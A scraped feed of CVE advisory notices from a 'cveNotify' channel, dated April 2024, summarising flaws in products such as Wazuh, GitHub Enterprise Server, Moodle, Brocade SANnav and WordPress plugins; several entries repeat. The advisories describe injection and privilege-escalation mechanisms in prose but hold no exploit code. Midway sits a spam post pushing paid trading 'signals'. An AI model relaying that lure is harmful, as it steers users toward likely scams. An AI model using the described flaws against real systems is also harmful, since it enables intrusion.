🚨 CVE-2021-2102Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).🎖@cveNotify |
|
| 2024-04-19 16:37:43 |
🚨 CVE-2024-3684A server side request forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin access to the appliance when configuring the Artifacts & Logs and Migrations Storage. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.12.2, 3.11.8, 3.10.10, and 3.9.13. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-04-19 16:37:42 |
🚨 CVE-2024-3470An Improper Privilege Management vulnerability was identified in GitHub Enterprise Server that allowed an attacker to use a deploy key pertaining to an organization to bypass an organization ruleset. An attacker would require access to a valid deploy key for a repository in the organization as well as repository administrator access. This vulnerability affected versions of GitHub Enterprise Server 3.11 to 3.12 and was fixed in versions 3.11.8 and 3.12.2. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-04-19 16:37:41 |
🚨 CVE-2024-32478Git Credential Manager (GCM) is a secure Git credential helper. Prior to 2.5.0, the Debian package does not set root ownership on installed files. This allows user 1001 on a multi-user system can replace binary and gain other users' privileges. This vulnerability is fixed in 2.5.0.🎖@cveNotify |
|
| 2024-04-19 16:37:37 |
🚨 CVE-2024-29030memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /api/resource that allows authenticated users to enumerate the internal network.🎖@cveNotify |
|
| 2024-04-19 16:37:36 |
🚨 CVE-2023-50260Wazuh is a free and open source platform used for threat prevention, detection, and response. A wrong validation in the `host_deny` script allows to write any string in the `hosts.deny` file, which can end in an arbitrary command execution on the target system. This vulnerability is part of the active response feature, which can automatically triggers actions in response to alerts. By default, active responses are limited to a set of pre defined executables. This is enforced by only allowing executables stored under `/var/ossec/active-response/bin` to be run as an active response. However, the `/var/ossec/active-response/bin/host_deny` can be exploited. `host_deny` is used to add IP address to the `/etc/hosts.deny` file to block incoming connections on a service level by using TCP wrappers. Attacker can inject arbitrary command into the `/etc/hosts.deny` file and execute arbitrary command by using the spawn directive. The active response can be triggered by writing events either to the local `execd` queue on server or to the `ar` queue which forwards the events to agents. So, it can leads to LPE on server as root and RCE on agent as root. This vulnerability is fixed in 4.7.2.🎖@cveNotify |
|
| 2024-04-19 16:37:35 |
🚨 CVE-2023-49275Wazuh is a free and open source platform used for threat prevention, detection, and response. A NULL pointer dereference was detected during fuzzing of the analysis engine, allowing malicious clients to DoS the analysis engine. The bug occurs when `analysisd` receives a syscollector message with the `hotfix` `msg_type` but lacking a `timestamp`. It uses `cJSON_GetObjectItem()` to get the `timestamp` object item and dereferences it without checking for a `NULL` value. A malicious client can DoS the analysis engine. This vulnerability is fixed in 4.7.1.🎖@cveNotify |
|
| 2024-04-19 16:37:32 |
🚨 CVE-2024-32166Webid v1.2.1 suffers from an Insecure Direct Object Reference (IDOR) - Broken Access Control vulnerability, allowing attackers to buy now an auction that is suspended (horizontal privilege escalation).🎖@cveNotify |
|
| 2024-04-19 16:37:31 |
🚨 CVE-2024-31745Libdwarf v0.9.1 was discovered to contain a heap use-after-free via the dw_empty_errlist_item function at /libdwarf/dwarf_alloc.c.🎖@cveNotify |
|
| 2024-04-19 16:37:30 |
🚨 CVE-2024-31744In Jasper 4.2.2, the jpc_streamlist_remove function in src/libjasper/jpc/jpc_dec.c:2407 has an assertion failure vulnerability, allowing attackers to cause a denial of service attack through a specific image file.🎖@cveNotify |
|
| 2024-04-19 16:37:26 |
🚨 CVE-2024-32024Kohya_ss is a GUI for Kohya's Stable Diffusion trainers. Kohya_ss is vulnerable to a path injection in the `common_gui.py` `add_pre_postfix` function. This vulnerability is fixed in 23.1.5.🎖@cveNotify |
|
| 2024-04-19 16:37:25 |
🚨 CVE-2024-32022Kohya_ss is a GUI for Kohya's Stable Diffusion trainers. Kohya_ss is vulnerable to command injection in basic_caption_gui.py. This vulnerability is fixed in 23.1.5.🎖@cveNotify |
|
| 2024-04-19 16:37:24 |
🚨 CVE-2024-31461Plane, an open-source project management tool, has a Server-Side Request Forgery (SSRF) vulnerability in versions prior to 0.17-dev. This issue may allow an attacker to send arbitrary requests from the server hosting the application, potentially leading to unauthorized access to internal systems. The impact of this vulnerability includes, but is not limited to, unauthorized access to internal services accessible from the server, potential leakage of sensitive information from internal services, manipulation of internal systems by interacting with internal APIs. Version 0.17-dev contains a patch for this issue. Those who are unable to update immediately may mitigate the issue by restricting outgoing network connections from servers hosting the application to essential services only and/or implementing strict input validation on URLs or parameters that are used to generate server-side requests.🎖@cveNotify |
|
| 2024-04-19 15:37:37 |
🚨 CVE-2024-3684A server side request forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin access to the appliance when configuring the Artifacts & Logs and Migrations Storage. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.12.2, 3.11.8, 3.10.10, and 3.9.13. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-04-19 15:37:33 |
🚨 CVE-2024-3646A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the instance when configuring the chat integration. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.12.2, 3.11.8, 3.10.10, and 3.9.13. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-04-19 15:37:31 |
🚨 CVE-2024-32478Git Credential Manager (GCM) is a secure Git credential helper. Prior to 2.5.0, the Debian package does not set root ownership on installed files. This allows user 1001 on a multi-user system can replace binary and gain other users' privileges. This vulnerability is fixed in 2.5.0.🎖@cveNotify |
|
| 2024-04-19 15:37:30 |
🚨 CVE-2024-32038Wazuh is a free and open source platform used for threat prevention, detection, and response. There is a buffer overflow hazard in wazuh-analysisd when handling Unicode characters from Windows Eventchannel messages. It impacts Wazuh Manager 3.8.0 and above. This vulnerability is fixed in Wazuh Manager 4.7.2.🎖@cveNotify |
|
| 2024-04-19 15:37:26 |
🚨 CVE-2024-29028memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/httpmeta that allows unauthenticated users to enumerate the internal network and receive limited html values in json form.🎖@cveNotify |
|
| 2024-04-19 15:37:25 |
🚨 CVE-2023-49275Wazuh is a free and open source platform used for threat prevention, detection, and response. A NULL pointer dereference was detected during fuzzing of the analysis engine, allowing malicious clients to DoS the analysis engine. The bug occurs when `analysisd` receives a syscollector message with the `hotfix` `msg_type` but lacking a `timestamp`. It uses `cJSON_GetObjectItem()` to get the `timestamp` object item and dereferences it without checking for a `NULL` value. A malicious client can DoS the analysis engine. This vulnerability is fixed in 4.7.1.🎖@cveNotify |
|
| 2024-04-19 15:37:24 |
🚨 CVE-2021-41526A vulnerability has been reported in the windows installer (MSI) built with InstallScript custom action. This vulnerability may allow privilege escalation when invoked ‘repair’ of the MSI which has an InstallScript custom action.🎖@cveNotify |
|
| 2024-04-19 14:37:42 |
🚨 CVE-2024-28076The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerability. A potential attacker can redirect to different domain when using URL parameter with relative entry in the correct format🎖@cveNotify |
|
| 2024-04-19 14:37:41 |
🚨 CVE-2023-35132A limited SQL injection risk was identified on the Mnet SSO access control page. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8, 3.11 to 3.11.14, 3.9 to 3.9.21 and earlier unsupported versions.🎖@cveNotify |
|
| 2024-04-19 14:37:40 |
🚨 CVE-2023-35131Content on the groups page required additional sanitizing to prevent an XSS risk. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8 and 3.11 to 3.11.14.🎖@cveNotify |
|
| 2024-04-19 14:37:37 |
🚨 CVE-2023-30944The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in external Wiki method for listing pages. A remote attacker can send a specially crafted request to the affected application and execute limited SQL commands within the application database.🎖@cveNotify |
|
| 2024-04-19 14:37:36 |
🚨 CVE-2023-28336Insufficient filtering of grade report history made it possible for teachers to access the names of users they could not otherwise access.🎖@cveNotify |
|
| 2024-04-19 14:37:35 |
🚨 CVE-2023-28334Authenticated users were able to enumerate other users' names via the learning plans page.🎖@cveNotify |
|
| 2024-04-19 14:37:31 |
🚨 CVE-2023-28332If the algebra filter was enabled but not functional (eg the necessary binaries were missing from the server), it presented an XSS risk.🎖@cveNotify |
|
| 2024-04-19 14:37:30 |
🚨 CVE-2023-28329Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers).🎖@cveNotify |
|
| 2024-04-19 14:37:26 |
🚨 CVE-2023-1544A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device. This flaw allows a crafted guest driver to allocate and initialize a huge number of page tables to be used as a ring of descriptors for CQ and async events, potentially leading to an out-of-bounds read and crash of QEMU.🎖@cveNotify |
|
| 2024-04-19 14:37:25 |
🚨 CVE-2023-23457A Segmentation fault was found in UPX in PackLinuxElf64::invert_pt_dynamic() in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.🎖@cveNotify |
|
| 2024-04-19 14:37:24 |
🚨 CVE-2023-23456A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.🎖@cveNotify |
|
| 2024-04-19 13:37:43 |
🚨 CVE-2024-30926Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the ./inc/kiosks.inc component.🎖@cveNotify |
|
| 2024-04-19 13:37:36 |
🚨 CVE-2024-22179The application is vulnerable to an unauthenticated parameter manipulation that allows an attacker to set the credentials to blank giving her access to the admin panel. Also vulnerable to account takeover and arbitrary password change.🎖@cveNotify |
|
| 2024-04-19 13:37:35 |
🚨 CVE-2024-30922SQL Injection vulnerability in DerbyNet v9.0 allows a remote attacker to execute arbitrary code via the where Clause in Award Document Rendering.🎖@cveNotify |
|
| 2024-04-19 13:37:31 |
🚨 CVE-2024-30920Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the render-document.php component.🎖@cveNotify |
|
| 2024-04-19 13:37:30 |
🚨 CVE-2024-32474Sentry is an error tracking and performance monitoring platform. Prior to 24.4.1, when authenticating as a superuser to Sentry with a username and password, the password is leaked as cleartext in logs under the _event_: `auth-index.validate_superuser`. An attacker with access to the log data could use these leaked credentials to login to the Sentry system as superuser. Self-hosted users on affected versions should upgrade to 24.4.1 or later. Users can configure the logging level to exclude logs of the `INFO` level and only generate logs for levels at `WARNING` or more.🎖@cveNotify |
|
| 2024-04-19 13:37:26 |
🚨 CVE-2024-29987Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-04-19 13:37:25 |
🚨 CVE-2024-23557HCL Connections contains a user enumeration vulnerability. Certain actions could allow an attacker to determine if the user is valid or not, leading to a possible brute force attack.🎖@cveNotify |
|
| 2024-04-19 13:37:24 |
🚨 CVE-2023-3758A race condition flaw was found in sssd where the GPO policy is not consistently applied for authenticated users. This may lead to improper authorization issues, granting or denying access to resources inappropriately.🎖@cveNotify |
|
| 2024-04-19 12:37:24 |
🚨 CVE-2024-32683Authorization Bypass Through User-Controlled Key vulnerability in Wpmet Wp Ultimate Review.This issue affects Wp Ultimate Review: from n/a through 2.2.5.🎖@cveNotify |
|
| 2024-04-19 09:37:25 |
🚨 CVE-2024-1065Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r45p0 through r48p0; Valhall GPU Kernel Driver: from r45p0 through r48p0; Arm 5th Gen GPU Architecture Kernel Driver: from r45p0 through r48p0.🎖@cveNotify |
|
| 2024-04-19 09:37:24 |
🚨 CVE-2024-0671Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Midgard GPU Kernel Driver: from r19p0 through r32p0; Bifrost GPU Kernel Driver: from r7p0 through r48p0; Valhall GPU Kernel Driver: from r19p0 through r48p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r48p0.🎖@cveNotify |
|
| 2024-04-19 07:37:29 |
🚨 CVE-2022-23084The total size of the user-provided nmreq to nmreq_copyin() was first computed and then trusted during the copyin. This time-of-check to time-of-use bug could lead to kernel memory corruption.On systems configured to include netmap in their devfs_ruleset, a privileged process running in a jail can affect the host environment.🎖@cveNotify |
|
| 2024-04-19 07:37:28 |
🚨 CVE-2023-51780An issue was discovered in the Linux kernel before 6.6.8. do_vcc_ioctl in net/atm/ioctl.c has a use-after-free because of a vcc_recvmsg race condition.🎖@cveNotify |
|
| 2024-04-19 06:37:24 |
🚨 CVE-2024-29968An information disclosure vulnerability exists in Brocade SANnav before v2.3.1 and v2.3.0a when Brocade SANnav instances are configured in disaster recovery mode. SQL Table names, column names, and SQL queries are collected in DR standby Supportsave. This could allow authenticated users to access the database structure and its contents.🎖@cveNotify |
|
| 2024-04-19 05:37:29 |
🚨 CVE-2024-2761The Genesis Blocks WordPress plugin before 3.1.3 does not properly escape data input provided to some of its blocks, allowing using with at least contributor privileges to conduct Stored XSS attacks.🎖@cveNotify |
|
| 2024-04-19 05:37:26 |
🚨 CVE-2024-29967In Brocade SANnav before Brocade SANnav v2.31 and v2.3.0a, it was observed that Docker instances inside the appliance have insecure mount points, allowing reading and writing access to sensitive files. The vulnerability could allow a sudo privileged user on the host OS to read and write access to these files.🎖@cveNotify |
|
| 2024-04-19 05:37:25 |
🚨 CVE-2024-29964Docker instances in Brocade SANnav before v2.3.1 and v2.3.0a have an insecure architecture and configuration that leads to multiple vulnerabilities. Docker daemons are exposed to the WAN interface, and other vulnerabilities allow total control over the Ova appliance. A Docker instance could access any other instances, and a few could access sensitive files. The vulnerability could allow a sudo privileged user on the underlying OS to access and modify these files.🎖@cveNotify |
|
| 2024-04-19 05:37:24 |
🚨 CVE-2024-29962Brocade SANnav OVA before v2.3.1 and v2.3.0a have an insecure file permission setting that makes files world-readable. This could allow a local user without the required privileges to access sensitive information or a Java binary.🎖@cveNotify |
|
| 2024-04-19 04:37:38 |
🚨 CVE-2024-29963Brocade SANnav OVA before v2.3.1, and v2.3.0a, contain hardcoded keys used by Docker to reach remote registries over TLS. TLS connections with an exposed key allow an attacker to MITM the traffic. Note: Brocade SANnav doesn't have access to remote Docker registries.🎖@cveNotify |
|
| 2024-04-19 04:37:37 |
🚨 CVE-2024-29960In the Brocade SANnav server versions before v2.3.1 and v2.3.0a, the SSH keys inside the OVA image are hardcoded and identical in the VM every time SANnav is installed. Any Brocade SANnav VM based on the official OVA images is vulnerable to MITM over SSH. An attacker can decrypt and compromise the SSH traffic to the SANnav appliance.🎖@cveNotify |
|
| 2024-04-19 04:37:36 |
🚨 CVE-2024-29959A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a prints Brocade Fabric OS switch encrypted passwords in the Brocade SANnav Standby node's support save.🎖@cveNotify |
|
| 2024-04-19 04:37:33 |
🚨 CVE-2024-29957When Brocade SANnav before v2.3.1 and v2.3.0a servers are configured in Disaster Recovery mode, the encryption key is stored in the DR log files. This could provide attackers with an additional, less-protected path to acquiring the encryption key.🎖@cveNotify |
|
| 2024-04-19 04:37:32 |
🚨 CVE-2023-50967latchset jose through version 11 allows attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value.🎖@cveNotify |
|
| 2024-04-19 04:37:31 |
🚨 CVE-2022-31629In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.🎖@cveNotify |
|
| 2024-04-19 03:37:25 |
🚨 CVE-2024-3615The Media Library Folders plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 8.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-19 03:37:24 |
🚨 CVE-2024-3600The Poll Maker – Best WordPress Poll Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to a missing capability check on the ays_poll_maker_quick_start AJAX action in addition to insufficient escaping and sanitization in all versions up to, and including, 5.1.8. This makes it possible for unauthenticated attackers to create quizzes and inject malicious web scripts into them that execute when a user visits the page.🎖@cveNotify |
|
| 2024-04-19 02:37:32 |
🚨 CVE-2024-23529An out-of-bounds read vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3, in certain conditions can allow an unauthenticated remote attacker to read sensitive information in memory.🎖@cveNotify |
|
| 2024-04-19 02:37:26 |
🚨 CVE-2024-23528An out-of-bounds read vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3, in certain conditions can allow an unauthenticated remote attacker to read sensitive information in memory.🎖@cveNotify |
|
| 2024-04-19 02:37:25 |
🚨 CVE-2023-50967latchset jose through version 11 allows attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value.🎖@cveNotify |
|
| 2024-04-19 02:37:24 |
🚨 CVE-2022-31629In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.🎖@cveNotify |
|
| 2024-04-19 01:37:24 |
🚨 CVE-2024-22857Heap based buffer flow in zlog v1.1.0 to v1.2.17 in zlog_rule_new().The size of record_name is MAXLEN_PATH(1024) + 1 but file_path may have data upto MAXLEN_CFG_LINE(MAXLEN_PATH*4) + 1. So a check was missing in zlog_rule_new() while copying the record_name from file_path + 1 which caused the buffer overflow. An attacker can exploit this vulnerability to overwrite the zlog_record_fn record_func function pointer to get arbitrary code execution or potentially cause remote code execution (RCE).🎖@cveNotify |
|
| 2024-04-19 00:37:24 |
🚨 CVE-2024-30938SQL Injection vulnerability in SEMCMS v.4.8 allows a remote attacker to obtain sensitive information via the ID parameter in the SEMCMS_User.php component.🎖@cveNotify |
|
| 2024-04-18 23:37:32 |
🚨 CVE-2024-3742Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.🎖@cveNotify |
|
| 2024-04-18 23:37:25 |
🚨 CVE-2024-21846An unauthenticated attacker can reset the board and stop transmitter operations by sending a specially-crafted GET request to the command.cgi gateway, resulting in a denial-of-service scenario.🎖@cveNotify |
|
| 2024-04-18 23:37:24 |
🚨 CVE-2024-3400A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-04-18 22:37:33 |
🚨 CVE-2024-30928SQL Injection vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary SQL commands via 'classids' Parameter in ajax/query.slide.next.inc🎖@cveNotify |
|
| 2024-04-18 22:37:27 |
🚨 CVE-2024-30927Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the racer-results.php component.🎖@cveNotify |
|
| 2024-04-18 22:37:26 |
🚨 CVE-2024-30924Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the checkin.php component.🎖@cveNotify |
|
| 2024-04-18 22:37:25 |
🚨 CVE-2024-22179The application is vulnerable to an unauthenticated parameter manipulation that allows an attacker to set the credentials to blank giving her access to the admin panel. Also vulnerable to account takeover and arbitrary password change.🎖@cveNotify |
|
| 2024-04-18 21:37:32 |
🚨 CVE-2024-30923SQL Injection vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the where Clause in Racer Document Rendering🎖@cveNotify |
|
| 2024-04-18 21:37:25 |
🚨 CVE-2024-30920Cross Site Scripting vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the render-document.php component.🎖@cveNotify |
|
| 2024-04-18 21:37:24 |
🚨 CVE-2024-1309Uncontrolled Resource Consumption vulnerability in Honeywell Niagara Framework on Windows, Linux, QNX allows Content Spoofing.This issue affects Niagara Framework: before Niagara AX 3.8.1, before Niagara 4.1.🎖@cveNotify |
|
| 2024-04-18 20:37:25 |
🚨 CVE-2024-32474Sentry is an error tracking and performance monitoring platform. Prior to 24.4.1, when authenticating as a superuser to Sentry with a username and password, the password is leaked as cleartext in logs under the _event_: `auth-index.validate_superuser`. An attacker with access to the log data could use these leaked credentials to login to the Sentry system as superuser. Self-hosted users on affected versions should upgrade to 24.4.1 or later. Users can configure the logging level to exclude logs of the `INFO` level and only generate logs for levels at `WARNING` or more.🎖@cveNotify |
|
| 2024-04-18 20:37:24 |
🚨 CVE-2024-20380A vulnerability in the HTML parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.The vulnerability is due to an issue in the C to Rust foreign function interface. An attacker could exploit this vulnerability by submitting a crafted file containing HTML content to be scanned by ClamAV on an affected device. An exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software.🎖@cveNotify |
|
| 2024-04-18 19:37:26 |
🚨 CVE-2024-29987Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-04-18 19:37:25 |
🚨 CVE-2023-3758A race condition flaw was found in sssd where the GPO policy is not consistently applied for authenticated users. This may lead to improper authorization issues, granting or denying access to resources inappropriately.🎖@cveNotify |
|
| 2024-04-18 19:37:24 |
🚨 CVE-2024-1597pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.28 are affected.🎖@cveNotify |
|
| 2024-04-18 16:57:57 |
Who's here? We've asked for a free link to a paid channel, for our subs.x2-x3 Signals here👉 CLICK HERE TO JOIN 👈👉 CLICK HERE TO JOIN 👈👉 CLICK HERE TO JOIN 👈❗️JOIN FAST! FIRST 1000 SUBS WILL BE ACCEPTED |
|
| 2024-04-18 13:07:51 |
🚨 CVE-2024-32744A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the PAGE KEYWORDS parameter under the CURRENT PAGE module.🎖@cveNotify |
|
| 2024-04-18 13:07:44 |
🚨 CVE-2024-32344A cross-site scripting (XSS) vulnerability in the Settings menu of CMSimple v5.15 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit parameter under the Language section.🎖@cveNotify |
|
| 2024-04-18 13:07:43 |
🚨 CVE-2024-32342A cross-site scripting (XSS) vulnerability in the Create Page of Boid CMS v2.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Permalink parameter.🎖@cveNotify |
|
| 2024-04-18 13:07:38 |
🚨 CVE-2024-32340A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the WEBSITE TITLE parameter under the Menu module.🎖@cveNotify |
|
| 2024-04-18 13:07:37 |
🚨 CVE-2024-32337A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ADMIN LOGIN URL parameter under the Security module.🎖@cveNotify |
|
| 2024-04-18 13:07:33 |
🚨 CVE-2024-29951Brocade SANnav before v2.3.1 and v2.3.0a uses the SHA-1 hash in internal SSH ports that are not open to remote connection.🎖@cveNotify |
|
| 2024-04-18 13:07:32 |
🚨 CVE-2024-21989ONTAP Select Deploy administration utility versions 9.12.1.x, 9.13.1.x and 9.14.1.x are susceptible to a vulnerability which when successfully exploited could allow a read-only user to escalate their privileges.🎖@cveNotify |
|
| 2024-04-18 13:07:31 |
🚨 CVE-2024-0257RoboDK v5.5.4 is vulnerable to heap-based buffer overflow while processing a specific project file. The resulting memory corruption may crash the application.🎖@cveNotify |
|
| 2024-04-18 11:37:41 |
🚨 CVE-2024-3948A vulnerability was found in SourceCodester Home Clean Service System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file \admin\student.add.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261440.🎖@cveNotify |
|
| 2024-04-18 11:37:38 |
🚨 CVE-2024-32689Missing Authorization vulnerability in GenialSouls WP Social Comments.This issue affects WP Social Comments: from n/a through 1.7.3.🎖@cveNotify |
|
| 2024-04-18 11:37:37 |
🚨 CVE-2024-32602Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in OnTheGoSystems WooCommerce Multilingual & Multicurrency.This issue affects WooCommerce Multilingual & Multicurrency: from n/a through 5.3.3.1.🎖@cveNotify |
|
| 2024-04-18 11:37:36 |
🚨 CVE-2024-32553Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in looks_awesome Superfly Menu allows Stored XSS.This issue affects Superfly Menu: from n/a through 5.0.25.🎖@cveNotify |
|
| 2024-04-18 11:37:32 |
🚨 CVE-2024-32552Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tagbox Taggbox allows Stored XSS.This issue affects Taggbox: from n/a through 3.2.🎖@cveNotify |
|
| 2024-04-18 11:37:31 |
🚨 CVE-2024-31229Server-Side Request Forgery (SSRF) vulnerability in Really Simple Plugins Really Simple SSL.This issue affects Really Simple SSL: from n/a through 7.2.3.🎖@cveNotify |
|
| 2024-04-18 11:37:30 |
🚨 CVE-2023-6897The EAN for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.9.2 via the the 'alg_wc_ean_product_meta' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to expose potentially sensitive post metadata.🎖@cveNotify |
|
| 2024-04-18 11:37:26 |
🚨 CVE-2023-49768Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormAssembly / Drew Buschhorn WP-FormAssembly allows Stored XSS.This issue affects WP-FormAssembly: from n/a through 2.0.10.🎖@cveNotify |
|
| 2024-04-18 11:37:25 |
🚨 CVE-2023-47843Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Zachary Segal CataBlog.This issue affects CataBlog: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-04-18 11:37:24 |
🚨 CVE-2023-3675Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Secomea GateManager (Web GUI) allows Reading Data from System Resources.This issue affects GateManager: from 11.0.623074018 before 11.0.623373051.🎖@cveNotify |
|
| 2024-04-18 10:37:44 |
🚨 CVE-2024-32572Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BdThemes Element Pack Elementor Addons allows Stored XSS.This issue affects Element Pack Elementor Addons: from n/a through 5.6.0.🎖@cveNotify |
|
| 2024-04-18 10:37:43 |
🚨 CVE-2024-32569Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metaphor Creations Ditty allows Stored XSS.This issue affects Ditty: from n/a through 3.1.31.🎖@cveNotify |
|
| 2024-04-18 10:37:42 |
🚨 CVE-2024-32568Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP 2FA allows Reflected XSS.This issue affects WP 2FA: from n/a through 2.6.2.🎖@cveNotify |
|
| 2024-04-18 10:37:38 |
🚨 CVE-2024-32566Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Club Manager allows Stored XSS.This issue affects WP Club Manager: from n/a through 2.2.11.🎖@cveNotify |
|
| 2024-04-18 10:37:37 |
🚨 CVE-2024-32564Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post Grid Team by WPXPO PostX – Gutenberg Blocks for Post Grid allows Stored XSS.This issue affects PostX – Gutenberg Blocks for Post Grid: from n/a through 4.0.1.🎖@cveNotify |
|
| 2024-04-18 10:37:36 |
